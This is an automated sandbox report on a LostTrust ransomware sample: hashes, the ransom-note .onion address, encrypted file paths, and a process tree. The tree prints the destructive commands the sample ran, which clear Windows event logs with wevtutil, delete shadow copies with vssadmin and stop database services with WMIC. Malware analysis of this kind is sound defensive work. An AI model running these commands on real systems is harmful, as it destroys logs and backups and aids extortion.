Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
26/09/2023, 05:24
Static task
static1
Behavioral task
behavioral1
Sample
25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe
Resource
win10v2004-20230915-en
General
-
Target
25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe
-
Size
301KB
-
MD5
4ae8efc6c80fe086aa27117619718fc2
-
SHA1
09170b8fd03258b0deaa7b881c46180818b88381
-
SHA256
25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708
-
SHA512
31aacad5277a2a6f8199be9bd457749689d678ae74c5eefe26165c3f1f369ad579ee279d26d6460ebaf7ffaef12c1bb5b53294a9c3d724c6288a0b8da3d7b539
-
SSDEEP
6144:a9GxIp80vvgsYW0/kNAhHDQGsarUs7/TvgfBEwmXjAbImzFps1Se:aYI/6MN0jQjbs7cBEaJzk/
Malware Config
Extracted
C:\Recovery\!LostTrustEncoded.txt
http://hscr6cjzhgoybibuzn2xud7u4crehuoo4ykw3swut7m7irde74hdfzyd.onion/s/qnwbjsfd
Signatures
-
Clears Windows event logs 1 TTPs 16 IoCs
pid Process 2212 wevtutil.exe 2384 wevtutil.exe 2824 wevtutil.exe 2112 wevtutil.exe 904 wevtutil.exe 1972 wevtutil.exe 2248 wevtutil.exe 1932 wevtutil.exe 2688 wevtutil.exe 2512 wevtutil.exe 2792 wevtutil.exe 2236 wevtutil.exe 2492 wevtutil.exe 2036 wevtutil.exe 2144 wevtutil.exe 3068 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (7053) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332268.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBRPH2.POC.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00178_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01840_.GIF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18182_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00557_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1036\MSO.ACL.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\!LostTrustEncoded.txt 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090089.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Pushpin.thmx.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\!LostTrustEncoded.txt 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\!LostTrustEncoded.txt 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\!LostTrustEncoded.txt 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00267_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN110.XML.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01138_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Fancy.dotx.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUB6INTL.REST.IDX_DLL.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana.css.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\!LostTrustEncoded.txt 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00601_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00902_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_F_COL.HXK.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18246_.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293236.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN011.XML.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0286068.WMF.losttrustencoded 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2724 sc.exe 2960 sc.exe 2100 sc.exe 2132 sc.exe 1244 sc.exe 1864 sc.exe 1124 sc.exe 1816 sc.exe 1472 sc.exe 2648 sc.exe 2896 sc.exe 2920 sc.exe 2568 sc.exe 2800 sc.exe 3016 sc.exe 1072 sc.exe 1476 sc.exe 3024 sc.exe 440 sc.exe 1616 sc.exe 1928 sc.exe 1072 sc.exe 2236 sc.exe 1880 sc.exe 2064 sc.exe 1596 sc.exe 2064 sc.exe 2940 sc.exe 868 sc.exe 2672 sc.exe 1272 sc.exe 2896 sc.exe 1192 sc.exe 2436 sc.exe 1576 sc.exe 2832 sc.exe 2100 sc.exe 2816 sc.exe 2648 sc.exe 2312 sc.exe 1480 sc.exe 2748 sc.exe 1944 sc.exe 544 sc.exe 1656 sc.exe 2496 sc.exe 2644 sc.exe 2596 sc.exe 2220 sc.exe 2300 sc.exe 2544 sc.exe 1636 sc.exe 2164 sc.exe 2760 sc.exe 2076 sc.exe 1408 sc.exe 2824 sc.exe 1084 sc.exe 2352 sc.exe 1632 sc.exe 2388 sc.exe 1648 sc.exe 2880 sc.exe 1756 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 440 vssadmin.exe 2532 vssadmin.exe 2668 vssadmin.exe 2032 vssadmin.exe -
Kills process with taskkill 12 IoCs
pid Process 1200 taskkill.exe 2092 taskkill.exe 2260 taskkill.exe 1616 taskkill.exe 3036 taskkill.exe 2668 taskkill.exe 1804 taskkill.exe 2100 taskkill.exe 1752 taskkill.exe 1896 taskkill.exe 2032 taskkill.exe 2152 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 904 wevtutil.exe Token: SeBackupPrivilege 904 wevtutil.exe Token: SeSecurityPrivilege 2384 wevtutil.exe Token: SeBackupPrivilege 2384 wevtutil.exe Token: SeSecurityPrivilege 1972 wevtutil.exe Token: SeBackupPrivilege 1972 wevtutil.exe Token: SeSecurityPrivilege 2036 wevtutil.exe Token: SeBackupPrivilege 2036 wevtutil.exe Token: SeBackupPrivilege 1036 vssvc.exe Token: SeRestorePrivilege 1036 vssvc.exe Token: SeAuditPrivilege 1036 vssvc.exe Token: SeIncreaseQuotaPrivilege 2600 WMIC.exe Token: SeSecurityPrivilege 2600 WMIC.exe Token: SeTakeOwnershipPrivilege 2600 WMIC.exe Token: SeLoadDriverPrivilege 2600 WMIC.exe Token: SeSystemProfilePrivilege 2600 WMIC.exe Token: SeSystemtimePrivilege 2600 WMIC.exe Token: SeProfSingleProcessPrivilege 2600 WMIC.exe Token: SeIncBasePriorityPrivilege 2600 WMIC.exe Token: SeCreatePagefilePrivilege 2600 WMIC.exe Token: SeBackupPrivilege 2600 WMIC.exe Token: SeRestorePrivilege 2600 WMIC.exe Token: SeShutdownPrivilege 2600 WMIC.exe Token: SeDebugPrivilege 2600 WMIC.exe Token: SeSystemEnvironmentPrivilege 2600 WMIC.exe Token: SeRemoteShutdownPrivilege 2600 WMIC.exe Token: SeUndockPrivilege 2600 WMIC.exe Token: SeManageVolumePrivilege 2600 WMIC.exe Token: 33 2600 WMIC.exe Token: 34 2600 WMIC.exe Token: 35 2600 WMIC.exe Token: SeIncreaseQuotaPrivilege 2600 WMIC.exe Token: SeSecurityPrivilege 2600 WMIC.exe Token: SeTakeOwnershipPrivilege 2600 WMIC.exe Token: SeLoadDriverPrivilege 2600 WMIC.exe Token: SeSystemProfilePrivilege 2600 WMIC.exe Token: SeSystemtimePrivilege 2600 WMIC.exe Token: SeProfSingleProcessPrivilege 2600 WMIC.exe Token: SeIncBasePriorityPrivilege 2600 WMIC.exe Token: SeCreatePagefilePrivilege 2600 WMIC.exe Token: SeBackupPrivilege 2600 WMIC.exe Token: SeRestorePrivilege 2600 WMIC.exe Token: SeShutdownPrivilege 2600 WMIC.exe Token: SeDebugPrivilege 2600 WMIC.exe Token: SeSystemEnvironmentPrivilege 2600 WMIC.exe Token: SeRemoteShutdownPrivilege 2600 WMIC.exe Token: SeUndockPrivilege 2600 WMIC.exe Token: SeManageVolumePrivilege 2600 WMIC.exe Token: 33 2600 WMIC.exe Token: 34 2600 WMIC.exe Token: 35 2600 WMIC.exe Token: SeIncreaseQuotaPrivilege 2300 WMIC.exe Token: SeSecurityPrivilege 2300 WMIC.exe Token: SeTakeOwnershipPrivilege 2300 WMIC.exe Token: SeLoadDriverPrivilege 2300 WMIC.exe Token: SeSystemProfilePrivilege 2300 WMIC.exe Token: SeSystemtimePrivilege 2300 WMIC.exe Token: SeProfSingleProcessPrivilege 2300 WMIC.exe Token: SeIncBasePriorityPrivilege 2300 WMIC.exe Token: SeCreatePagefilePrivilege 2300 WMIC.exe Token: SeBackupPrivilege 2300 WMIC.exe Token: SeRestorePrivilege 2300 WMIC.exe Token: SeShutdownPrivilege 2300 WMIC.exe Token: SeDebugPrivilege 2300 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2456 wrote to memory of 484 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 29 PID 2456 wrote to memory of 484 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 29 PID 2456 wrote to memory of 484 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 29 PID 2456 wrote to memory of 484 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 29 PID 484 wrote to memory of 904 484 cmd.exe 31 PID 484 wrote to memory of 904 484 cmd.exe 31 PID 484 wrote to memory of 904 484 cmd.exe 31 PID 484 wrote to memory of 904 484 cmd.exe 31 PID 2456 wrote to memory of 2504 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 32 PID 2456 wrote to memory of 2504 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 32 PID 2456 wrote to memory of 2504 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 32 PID 2456 wrote to memory of 2504 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 32 PID 2504 wrote to memory of 2384 2504 cmd.exe 34 PID 2504 wrote to memory of 2384 2504 cmd.exe 34 PID 2504 wrote to memory of 2384 2504 cmd.exe 34 PID 2504 wrote to memory of 2384 2504 cmd.exe 34 PID 2456 wrote to memory of 832 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 35 PID 2456 wrote to memory of 832 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 35 PID 2456 wrote to memory of 832 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 35 PID 2456 wrote to memory of 832 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 35 PID 832 wrote to memory of 1972 832 cmd.exe 37 PID 832 wrote to memory of 1972 832 cmd.exe 37 PID 832 wrote to memory of 1972 832 cmd.exe 37 PID 832 wrote to memory of 1972 832 cmd.exe 37 PID 2456 wrote to memory of 2560 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 38 PID 2456 wrote to memory of 2560 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 38 PID 2456 wrote to memory of 2560 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 38 PID 2456 wrote to memory of 2560 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 38 PID 2560 wrote to memory of 2036 2560 cmd.exe 40 PID 2560 wrote to memory of 2036 2560 cmd.exe 40 PID 2560 wrote to memory of 2036 2560 cmd.exe 40 PID 2560 wrote to memory of 2036 2560 cmd.exe 40 PID 2456 wrote to memory of 1632 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 42 PID 2456 wrote to memory of 1632 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 42 PID 2456 wrote to memory of 1632 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 42 PID 2456 wrote to memory of 1632 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 42 PID 1632 wrote to memory of 440 1632 cmd.exe 44 PID 1632 wrote to memory of 440 1632 cmd.exe 44 PID 1632 wrote to memory of 440 1632 cmd.exe 44 PID 1632 wrote to memory of 440 1632 cmd.exe 44 PID 2456 wrote to memory of 2712 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 46 PID 2456 wrote to memory of 2712 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 46 PID 2456 wrote to memory of 2712 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 46 PID 2456 wrote to memory of 2712 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 46 PID 2712 wrote to memory of 2600 2712 cmd.exe 48 PID 2712 wrote to memory of 2600 2712 cmd.exe 48 PID 2712 wrote to memory of 2600 2712 cmd.exe 48 PID 2712 wrote to memory of 2600 2712 cmd.exe 48 PID 2456 wrote to memory of 1628 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 50 PID 2456 wrote to memory of 1628 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 50 PID 2456 wrote to memory of 1628 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 50 PID 2456 wrote to memory of 1628 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 50 PID 1628 wrote to memory of 2300 1628 cmd.exe 52 PID 1628 wrote to memory of 2300 1628 cmd.exe 52 PID 1628 wrote to memory of 2300 1628 cmd.exe 52 PID 1628 wrote to memory of 2300 1628 cmd.exe 52 PID 2456 wrote to memory of 2536 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 53 PID 2456 wrote to memory of 2536 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 53 PID 2456 wrote to memory of 2536 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 53 PID 2456 wrote to memory of 2536 2456 25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe 53 PID 2536 wrote to memory of 2824 2536 cmd.exe 55 PID 2536 wrote to memory of 2824 2536 cmd.exe 55 PID 2536 wrote to memory of 2824 2536 cmd.exe 55 PID 2536 wrote to memory of 2824 2536 cmd.exe 55 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe"C:\Users\Admin\AppData\Local\Temp\25a906877af7aed44c21b4c947a34666c3480629a929a227b67b273245ee3708.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl Application2⤵
- Suspicious use of WriteProcessMemory
PID:484 -
C:\Windows\SysWOW64\wevtutil.exewevtutil cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl security2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\wevtutil.exewevtutil cl security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl setup2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\wevtutil.exewevtutil cl setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl system2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\wevtutil.exewevtutil cl system3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:2420
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC2⤵PID:2016
-
